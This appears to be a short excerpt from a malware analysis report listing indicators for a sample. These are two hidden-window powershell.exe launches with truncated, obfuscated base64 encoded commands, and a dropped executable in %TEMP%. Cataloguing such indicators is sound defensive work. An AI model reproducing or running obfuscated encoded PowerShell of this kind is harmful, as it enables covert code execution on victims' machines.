Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABzAEMAUgBJAGAAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBuACcALAAnAHcALQBvAGIAagBlACcALAAnAGUAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7AD...
- %TEMP%\38878.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABzAEMAUgBJAGAAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBuACcALAAnAHcALQBvAGIAagBlACcALAAnAGUAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7AD...' (with hidden window)